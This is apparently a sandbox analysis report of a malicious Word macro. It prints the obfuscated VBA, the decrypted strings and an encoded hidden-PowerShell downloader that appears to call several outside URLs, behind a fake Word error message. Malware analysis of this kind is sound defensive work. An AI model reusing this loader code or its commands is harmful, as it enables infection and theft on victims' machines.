AWwAzACcAKwAnADoALwAnACkAKwAnAC8AJwArACgAJwBwACcAKwAnAGUAdABhAGYAJwApACsAKAAnAGkAbABtACcAKwAnAC4AYwBvACcAKQArACcAbQAnACsAKAAnAC8AdwAnACsAJwBwACcAKQArACgAJwAtAGEAJwArACcAZABtACcAKwAnAGkAbgAnACsAJwAvADQAbQAvAEAAXQAnACkAKwAnAGEAJwArACgAJwBuACcAKwAnAHcAWwAzACcAKwAnADoALwAvAGcAaQAnACsAJwB2AGkAJwApACsAKAAnAG4AZwAnACsAJwB0AGgAYQAnACsAJwBuAGsAcwBkACcAKQArACcAYQBpACcAKwAnAGwAJwArACgAJwB5AC4AYwAnACsAJwBvAG0ALwBxAGwARQAvAFYAZQBGAC8AJwArACcAQABdAGEAJwArACcAbgAnACkAKwAoACcAdwAnACsAJwBbADMAOgAvAC8AdwAnACkAKwAoACcAYQBwACcAKwAnAC4AJwApACsAJwB6AGgAJwArACgAJwBvAG4AZwAnACsAJwBsACcAKQArACcAaQAnACsAKAAnAHMAYwAnACsAJwAuAGMAJwArACcAbwAnACsAJwBtAC8AdwBwAC0AaQBuAGMAJwApACsAKAAnAGwAdQAnACsAJwBkAGUAcwAnACsAJwAvAFEAcgAnACsAJwB5AEMAJwApACsAJwBCAC8AJwArACcAQAAnACsAKAAnAF0AJwArACcAYQBuAHcAJwApACsAKAAnAFsAMwAnACsAJwBzADoALwAnACsAJwAvAGYAJwArACcAbgAnACsAJwBqAGIAcQAuAGMAbwBtAC8AdwBwAC0AaQAnACkAKwAoACcAbgBjACcAKwAnAGwAdQBkAGUAJwArACcAcwAvACcAKQArACgAJwByACcAKwAnAGwAUgAvAEAAJwArACcAXQBhAG4AdwBbACcAKwAnADMAcwAnACsAJwA6AC8ALwBzAGEAawAnACkAKwAoACcAaAAnACsAJwBpAHMAdQBoACcAKwAnAGEAbgAnACkAKwAnAGkAJwArACgAJwBuACcAKwAnAGEAcgBpAGoAZQAnACkAKwAoACcAZQB2AGkAawAnACsAJwBhAC4AJwApACsAKAAnAGMAJwArACcAbwBtAC8AJwApACsAJwB3ACcAKwAoACcAcAAnACsAJwAtAGkAJwApACsAKAAnAG4AYwAnACsAJwBsAHUAZAAnACkAKwAoACcAZQBzACcAKwAnAC8AQwB2AEcAJwApACsAKAAnAFUAJwArACcAagB2AEUALwBAAF0AJwArACcAYQBuAHcAWwAzADoAJwArACcALwAnACkAKwAoACcALwAnACsAJwB6ACcAKwAnAGkAZQBmAGwAaQB4ACcAKQArACgAJwAuACcAKwAnAHQAZQBsAGUAJwArACcAcwBrACcAKwAnAG8AJwArACcAcABzAHQAbwByAGUALgBjAG8AJwArACcAbQAnACkAKwAnAC8AYwAnACsAJwBnAGkAJwArACgAJwAtACcAKwAnAGIAaQBuACcAKQArACgAJwAvAEcAJwArACcAdAAzAFMALwBAACcAKQArACcAXQAnACsAJwBhAG4AJwArACgAJwB3AFsAJwArACcAMwAnACkAKwAnAHMAOgAnACsAKAAnAC8ALwBzAG8AbQBhAG4AYQBwAC4AYwBvACcAKwAnAG0ALwB3AHAAJwArACcALQBhAGQAJwArACcAbQAnACkAKwAoACcAaQBuACcAKwAnAC8AJwApACsAJwBQAC8AJwApAC4AIgByAGUAUABMAGAAQQBjAEUAIgAoACgAKAAnAF0AYQAnACsAJwBuAHcAJwApACsAJwBbACcAKwAnADMAJwApACwAKABbAGEAcgByAGEAeQB,,) -> 0
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: rtGyqOth
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: CreateObject
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: CreateTextFile
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: wUoJIFDD
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: Close
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: XKPUEfhk
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: xOnWA
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: CreateObject
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: CreateTextFile
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: kboRA
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: Close
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: wCjuwBBGN
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: HOkLRDGd
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: CreateObject
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: CreateTextFile
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: eBddHTXP
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: Close
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: TFXNGIiH
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: lgZgGO
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: CreateObject
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: CreateTextFile
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: UMzHfyAfA
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: Close
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: zgBjJOGEH
Rua2q5h93ydvt
Ijq0g4n16u9apwecr
QEIFFM
CreateObject
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: rtGyqOth
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: CreateObject
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: CreateTextFile
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: wUoJIFDD
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: Close
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: XKPUEfhk
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: xOnWA
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: CreateObject
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: CreateTextFile
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: kboRA
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: Close
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: wCjuwBBGN
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: HOkLRDGd
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: CreateObject
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: CreateTextFile
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: eBddHTXP
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: Close
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: TFXNGIiH
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: lgZgGO
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: CreateObject
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: CreateTextFile
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: UMzHfyAfA
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: Close
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: zgBjJOGEH
CreateTextFile
WriteLine
WriteLine
WriteLine
rJqMZII
Close
JHrNWdBsW
PGiog
CreateObject
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: rtGyqOth
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: CreateObject
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: CreateTextFile
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: wUoJIFDD
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: Close
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: XKPUEfhk
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: xOnWA
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: CreateObject
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: CreateTextFile
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: kboRA
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: Close
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: wCjuwBBGN
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: HOkLRDGd
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: CreateObject
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: CreateTextFile
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: eBddHTXP
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: Close
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: TFXNGIiH
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: lgZgGO
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: CreateObject
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: CreateTextFile
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: UMzHfyAfA
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: Close
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: zgBjJOGEH
CreateTextFile
WriteLine
WriteLine
WriteLine
NSiRQzd
Close
txKQv

Strings	Decrypted Strings
"H3c5_hufv8jcabt5""U58aumvxubigihzb"
"]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"
"gMEpHB:\SKWvYCA\YtZqA.fQoAE"
"WMwcBSqFohy"
"HfXAPQQbXKJHFGu"
"GDTGdEJpuRnDBFQ"
"]anw[3""p]anw[3"
"]an""w[3ro]anw[3]a""nw[3ce]anw[3s]anw[3s]anw[3]anw[3"
"]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"
"ehLoAm:\PAVZiAGU\jVPHv.fAgoFBYmC"
"akTuJaIGmZrUyF"
"bAurYaGPwGKRiG"
"dvqIBFEqwfkI"
"]anw[3:w]anw[3]anw[3i""n]anw[33]anw[32]anw[3_]anw[3"
"]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"
"eCzvxHN:\cgVnKGAT\YcnDi.YqiJOp"
"gcZaHCGUVJsFmL"
"OnehVAaWbfCAcAjsG"
"ohaTGaUTSwwDv"
"w]anw[3in]anw[3m]an""w[3gm]anw[3t]anw[3]anw[3"
"]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"
"grPSDMS:\lQkJoR\aZMUgjGC.pVvhaH"
"SjDfYFUFPynYGu"
"yKdJWHAniqHFCB"
"JCgblEAJizSfW"
"]anw[3""]anw[3"
"]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"
"lBasV:\tFGoGJd\zBuHfBCN.AHGggII"
"ncDMUIadusSIDx"
"OcgtIFEeoIFhxt"
"cGDcNrWsPeGCDF"
"]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"
"FyNFG:\ugXUH\cZIFypIHj.tRULIINC"
"vRrzDEngIQvFPJfE"
"lHuxHADjraNFBgI"
"PzrrnIFtpmxAx"
"]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"
"dFVzNBE:\EBCOlEEOJ\KlKcJKk.SVIvoAEqG"
"WXovaGHxqSlUt"
"goMgGBdJMUDLAG"
"kWzGMzIVefGB"
"]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"
"tLvao:\aGKUA\AhQhj.BDOQSJWG"
"jVSXGfhYCxoHFD"
"GqMIEnOQFEEDsE"
"DkRmTYGAMxqHI"
"]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"
"VxskFWpm:\cuyOFYrFJ\SZSlaGJZi.TeBYCDZ"
"bOOXnOJYtbRAbm"
"eSpcpGDZncccrFb"
"fUwLgjVtQyH"
"]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"
"OPLPBI:\fNyAExIq\jrtno.FyobBAAFE"
"OTLmJCwhyQMFzlB"
"TthascRlxHZH"
"frvvJFHIkftmZHE"
"]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"
"TNJvoD:\walkrfAE\EalrWFWTE.wDSOEJ"
"BQumCJmmiAGIKv"
"HiTyACJmCuGQFFJ"
"TJahKRWdrvHFIy"
"]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"
"PkeJHBJJH:\ODJMGCw\NefpJHvCX.XzgyeCQuA"
"HwixyOCYxmojd"
"xtsHGQjpNzDIYJ"
"koDuGqAOJBlLgZIEme"

Line	Instruction	Meta Information
2	Function Dn5440l_hb7()
3	On Error Resume Next	executed
4	Pwpakrxjqhci6 = "H3c5_hufv8jcabt5" + "U58aumvxubigihzb"
5	sf4 = P1x1ag4qbt2iq + Wm_t404p8v_.StoryRanges.Item(2 / 2) + Swvko0y1qshqgm_	P1x1ag4qbt2iq Item Swvko0y1qshqgm_
6	Goto VJbwzTDT
7	Dim ChWZVJiB as Object
8	Set RLurCDDF = EajdMLeD	EajdMLeD
9	Set ChWZVJiB = CreateObject(Bp63ahh3hb4hyq("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))	CreateObject
10	Dim VJbwzTDT as Object
11	Set VJbwzTDT = ChWZVJiB.CreateTextFile("gMEpHB:\SKWvYCA\YtZqA.fQoAE")	CreateTextFile
12	VJbwzTDT.WriteLine "WMwcBSqFohy"	WriteLine
13	VJbwzTDT.WriteLine "HfXAPQQbXKJHFGu"	WriteLine
14	VJbwzTDT.WriteLine "GDTGdEJpuRnDBFQ"	WriteLine
15	Set XTdPHz = qpOWEIHHA	qpOWEIHHA
16	VJbwzTDT.Close	Close
17	Set ChWZVJiB = Nothing
18	Set sGvJJWh = yjNpyrf	yjNpyrf
19	Set VJbwzTDT = Nothing
19	VJbwzTDT:
21	t3s = "]anw[3" + "p]anw[3"
22	Shahvgsluly1 = "]an" + "w[3ro]anw[3]a" + "nw[3ce]anw[3s]anw[3s]anw[3]anw[3"
23	Goto JhiYfXc
24	Dim HnBvAEH as Object
25	Set cTfCJ = SynsDAgHG	SynsDAgHG
26	Set HnBvAEH = CreateObject(Bp63ahh3hb4hyq("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))	CreateObject
27	Dim JhiYfXc as Object
28	Set JhiYfXc = HnBvAEH.CreateTextFile("ehLoAm:\PAVZiAGU\jVPHv.fAgoFBYmC")	CreateTextFile
29	JhiYfXc.WriteLine "akTuJaIGmZrUyF"	WriteLine
30	JhiYfXc.WriteLine "bAurYaGPwGKRiG"	WriteLine
31	JhiYfXc.WriteLine "dvqIBFEqwfkI"	WriteLine
32	Set pDPzBJmM = fUGQf	fUGQf
33	JhiYfXc.Close	Close
34	Set HnBvAEH = Nothing
35	Set FPWaF = gglHam	gglHam
36	Set JhiYfXc = Nothing
36	JhiYfXc:
38	H28xnqjqdre3n2g2t = "]anw[3:w]anw[3]anw[3i" + "n]anw[33]anw[32]anw[3_]anw[3"
39	Goto DRrKpoA
40	Dim xxYeFGUAH as Object
41	Set HMyHCQCGu = reTrs	reTrs
42	Set xxYeFGUAH = CreateObject(Bp63ahh3hb4hyq("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))	CreateObject
43	Dim DRrKpoA as Object
44	Set DRrKpoA = xxYeFGUAH.CreateTextFile("eCzvxHN:\cgVnKGAT\YcnDi.YqiJOp")	CreateTextFile
45	DRrKpoA.WriteLine "gcZaHCGUVJsFmL"	WriteLine
46	DRrKpoA.WriteLine "OnehVAaWbfCAcAjsG"	WriteLine
47	DRrKpoA.WriteLine "ohaTGaUTSwwDv"	WriteLine
48	Set AiICOj = ukrnIFCE	ukrnIFCE
49	DRrKpoA.Close	Close
50	Set xxYeFGUAH = Nothing
51	Set blQEM = syDRd	syDRd
52	Set DRrKpoA = Nothing
52	DRrKpoA:
54	Kyklcj8d5dak20povy = "w]anw[3in]anw[3m]an" + "w[3gm]anw[3t]anw[3]anw[3"
55	Goto AybxtEBCJ
56	Dim bGMXEIA as Object
57	Set VbMBBgf = wuKBFvqI	wuKBFvqI
58	Set bGMXEIA = CreateObject(Bp63ahh3hb4hyq("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))	CreateObject
59	Dim AybxtEBCJ as Object
60	Set AybxtEBCJ = bGMXEIA.CreateTextFile("grPSDMS:\lQkJoR\aZMUgjGC.pVvhaH")	CreateTextFile
61	AybxtEBCJ.WriteLine "SjDfYFUFPynYGu"	WriteLine
62	AybxtEBCJ.WriteLine "yKdJWHAniqHFCB"	WriteLine
63	AybxtEBCJ.WriteLine "JCgblEAJizSfW"	WriteLine
64	Set cSHkDL = VwnpBElhO	VwnpBElhO
65	AybxtEBCJ.Close	Close
66	Set bGMXEIA = Nothing
67	Set SfMKIOk = RvFOAEPH	RvFOAEPH
68	Set AybxtEBCJ = Nothing
68	AybxtEBCJ:
70	Pidl4mt91219jzdn = "]anw[3" + "]anw[3" + Mid(Application.Name, 4 + 2, 2 - 1) + "]anw[" + "3]anw[3"	Mid Name Application
71	Goto uJSEDH
72	Dim dLrgANHCG as Object
73	Set CHKzNBD = vitXEH	vitXEH
74	Set dLrgANHCG = CreateObject(Bp63ahh3hb4hyq("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))	CreateObject
75	Dim uJSEDH as Object
76	Set uJSEDH = dLrgANHCG.CreateTextFile("lBasV:\tFGoGJd\zBuHfBCN.AHGggII")	CreateTextFile
77	uJSEDH.WriteLine "ncDMUIadusSIDx"	WriteLine
78	uJSEDH.WriteLine "OcgtIFEeoIFhxt"	WriteLine
79	uJSEDH.WriteLine "cGDcNrWsPeGCDF"	WriteLine
80	Set numuq = oUWfJGBeE	oUWfJGBeE
81	uJSEDH.Close	Close
82	Set dLrgANHCG = Nothing
83	Set XDJPUW = EJEApM	EJEApM
84	Set uJSEDH = Nothing
84	uJSEDH:
86	R0ty4lh4i_yv94lx8 = Kyklcj8d5dak20povy + Pidl4mt91219jzdn + H28xnqjqdre3n2g2t + t3s + Shahvgsluly1
87	Goto tcYiEMeRH
88	Dim RNgUODjsM as Object
89	Set WtNcAKUFt = YzIkA	YzIkA
90	Set RNgUODjsM = CreateObject(Bp63ahh3hb4hyq("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))	CreateObject
91	Dim tcYiEMeRH as Object
92	Set tcYiEMeRH = RNgUODjsM.CreateTextFile("FyNFG:\ugXUH\cZIFypIHj.tRULIINC")	CreateTextFile
93	tcYiEMeRH.WriteLine "vRrzDEngIQvFPJfE"	WriteLine
94	tcYiEMeRH.WriteLine "lHuxHADjraNFBgI"	WriteLine
95	tcYiEMeRH.WriteLine "PzrrnIFtpmxAx"	WriteLine
96	Set rfDgD = CCnbXRBeA	CCnbXRBeA
97	tcYiEMeRH.Close	Close
98	Set RNgUODjsM = Nothing
99	Set dTtuVsDVA = oMcHDXEF	oMcHDXEF
100	Set tcYiEMeRH = Nothing
100	tcYiEMeRH:
102	Hb94758udqnr = Bp63ahh3hb4hyq(R0ty4lh4i_yv94lx8)
103	Goto gQxBD
104	Dim PAxhJ as Object
105	Set vtDUw = SOunIGkF	SOunIGkF
106	Set PAxhJ = CreateObject(Bp63ahh3hb4hyq("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))	CreateObject
107	Dim gQxBD as Object
108	Set gQxBD = PAxhJ.CreateTextFile("dFVzNBE:\EBCOlEEOJ\KlKcJKk.SVIvoAEqG")	CreateTextFile
109	gQxBD.WriteLine "WXovaGHxqSlUt"	WriteLine
110	gQxBD.WriteLine "goMgGBdJMUDLAG"	WriteLine
111	gQxBD.WriteLine "kWzGMzIVefGB"	WriteLine
112	Set CmcBTTABc = XsKjcKE	XsKjcKE
113	gQxBD.Close	Close
114	Set PAxhJ = Nothing
115	Set MMAqSI = eWkHqVao	eWkHqVao
116	Set gQxBD = Nothing
116	gQxBD:
118	Set Zpeehqbjjey = CreateObject(Hb94758udqnr)	CreateObject("winmgmts:win32_process") executed
119	Goto RkPWCDPC
120	Dim xkJxAAC as Object
121	Set FgmzCEm = VfJHAA	VfJHAA
122	Set xkJxAAC = CreateObject(Bp63ahh3hb4hyq("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))	CreateObject
123	Dim RkPWCDPC as Object
124	Set RkPWCDPC = xkJxAAC.CreateTextFile("tLvao:\aGKUA\AhQhj.BDOQSJWG")	CreateTextFile
125	RkPWCDPC.WriteLine "jVSXGfhYCxoHFD"	WriteLine
126	RkPWCDPC.WriteLine "GqMIEnOQFEEDsE"	WriteLine
127	RkPWCDPC.WriteLine "DkRmTYGAMxqHI"	WriteLine
128	Set OtQPAJH = zOBhOx	zOBhOx
129	RkPWCDPC.Close	Close
130	Set xkJxAAC = Nothing
131	Set NtpdEJDH = XjhOHEMDC	XjhOHEMDC
132	Set RkPWCDPC = Nothing
132	RkPWCDPC:
134	Tz4pisa96444x1 = Mid(sf4, (1 + 4), Len(sf4))	Mid Len("\x01 ]anw[3]anw[3c]anw[3m]anw[3d]anw[3 ]anw[3c]anw[3m]anw[3d]anw[3 ]anw[3c]anw[3m]anw[3d]anw[3 ]anw[3c]anw[3m]anw[3d]anw[3 ]anw[3/]anw[3c]anw[3 ]anw[3m]anw[3s]anw[3g]anw[3 ]anw[3%]anw[3u]anw[3s]anw[3e]anw[3r]anw[3n]anw[3a]anw[3m]anw[3e]anw[3%]anw[3 ]anw[3/]anw[3v]anw[3 ]anw[3W]anw[3o]anw[3r]anw[3d]anw[3 ]anw[3e]anw[3x]anw[3p]anw[3e]anw[3r]anw[3i]anw[3e]anw[3n]anw[3c]anw[3e]anw[3d]anw[3 ]anw[3a]anw[3n]anw[3 ]anw[3e]anw[3r]anw[3r]anw[3o]anw[3r]anw[3 ]anw[3t]anw[3r]anw[3y]anw[3i]anw[3n]anw[3g]anw[3 ]anw[3t]anw[3o]anw[3 ]anw[3o]anw[3p]anw[3e]anw[3n]anw[3 ]anw[3t]anw[3h]anw[3e]anw[3 ]anw[3f]anw[3i]anw[3l]anw[3e]anw[3.]anw[3 ]anw[3&]anw[3 ]anw[3 ]anw[3P]anw[3^]anw[3O]anw[3w]anw[3^]anw[3e]anw[3r]anw[3^]anw[3s]anw[3h]anw[3e]anw[3^]anw[3L]anw[3^]anw[3L]anw[3 ]anw[3-]anw[3w]anw[3 ]anw[3h]anw[3i]anw[3d]anw[3d]anw[3e]anw[3n]anw[3 ]anw[3-]anw[3E]anw[3N]anw[3C]anw[3O]anw[3D]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 JA]anw[3A5]anw[3AD]anw[3UA]anw[3WA]anw[3BV]anw[3AG]anw[3MA]anw[3RA]anw[3Ag]anw[3AC]anw[3AA]anw[3PQ]anw[3Ag]anw[3AC]anw[3AA]anw[3Ww]anw[3BU]anw[3AF]anw[3kA]anw[3cA]anw[3BF]anw[3AF]anw[30A]anw[3KA]anw[3Ai]anw[3AH]anw[3sA]anw[3MA]anw[3B9]anw[3AH]anw[3sA]anw[3Mg]anw[3B9]anw[3AH]anw[3sA]anw[3NA]anw[3B9]anw[3AH]anw[3sA]anw[3Mw]anw[3B9]anw[3AH]anw[3sA]anw[3MQ]anw[3B9]anw[3AC]anw[3IA]anw[3IA]anw[3At]anw[3AG]anw[3YA]anw[3Jw]anw[3BT]anw[3AF]anw[3kA]anw[3Uw]anw[3BU]anw[3AG]anw[3UA]anw[3Jw]anw[3As]anw[3AC]anw[3cA]anw[3Qw]anw[3BU]anw[3AE]anw[38A]anw[3Ug]anw[3B5]anw[3AC]anw[3cA]anw[3LA]anw[3An]anw[3AE]anw[30A]anw[3Jw]anw[3As]anw[3AC]anw[3cA]anw[3Ug]anw[3BF]anw[3AC]anw[3cA]anw[3LA]anw[3An]anw[3AC]anw[34A]anw[3aQ]anw[3Bv]anw[3AC]anw[34A]anw[3ZA]anw[3BJ]anw[3AC]anw[3cA]anw[3KQ]anw[3Ag]anw[3AC]anw[3AA]anw[3Ow]anw[3Ag]anw[3AC]anw[3AA]anw[3cw]anw[3BF]anw[3AF]anw[3QA]anw[3LQ]anw[3BJ]anw[3AH]anw[3QA]anw[3RQ]anw[3Bt]anw[3AC]anw[3AA]anw[3IA]anw[3Ao]anw[3AC]anw[3cA]anw[3Vg]anw[3An]anw[3AC]anw[3sA]anw[3Jw]anw[3Bh]anw[3AH]anw[3IA]anw[3aQ]anw[3BB]anw[3AE]anw[3IA]anw[3TA]anw[3Bl]anw[3AC]anw[3cA]anw[3Kw]anw[3An]anw[3AD]anw[3oA]anw[3Rg]anw[3BJ]anw[3AF]anw[3UA]anw[3Jw]anw[3Ap]anw[3AC]anw[3AA]anw[3IA]anw[3Ao]anw[3AC]anw[3AA]anw[3IA]anw[3Bb]anw[3AH]anw[3QA]anw[3eQ]anw[3Bw]anw[3AE]anw[3UA]anw[3XQ]anw[3Ao]anw[3AC]anw[3IA]anw[3ew]anw[3Ax]anw[3AH]anw[30A]anw[3ew]anw[3A0]anw[3AH]anw[30A]anw[3ew]anw[3Aw]anw[3AH]anw[30A]anw[3ew]anw[3A2]anw[3AH]anw[30A]anw[3ew]anw[3A1]anw[3AH]anw[30A]anw[3ew]anw[3Az]anw[3AH]anw[30A]anw[3ew]anw[3Ay]anw[3AH]anw[30A]anw[3Ig]anw[3Ag]anw[3AC]anw[30A]anw[3Zg]anw[3An]anw[3AE]anw[30A]anw[3Lg]anw[3Bu]anw[3AE]anw[3UA]anw[3VA]anw[3Au]anw[3AF]anw[3MA]anw[3ZQ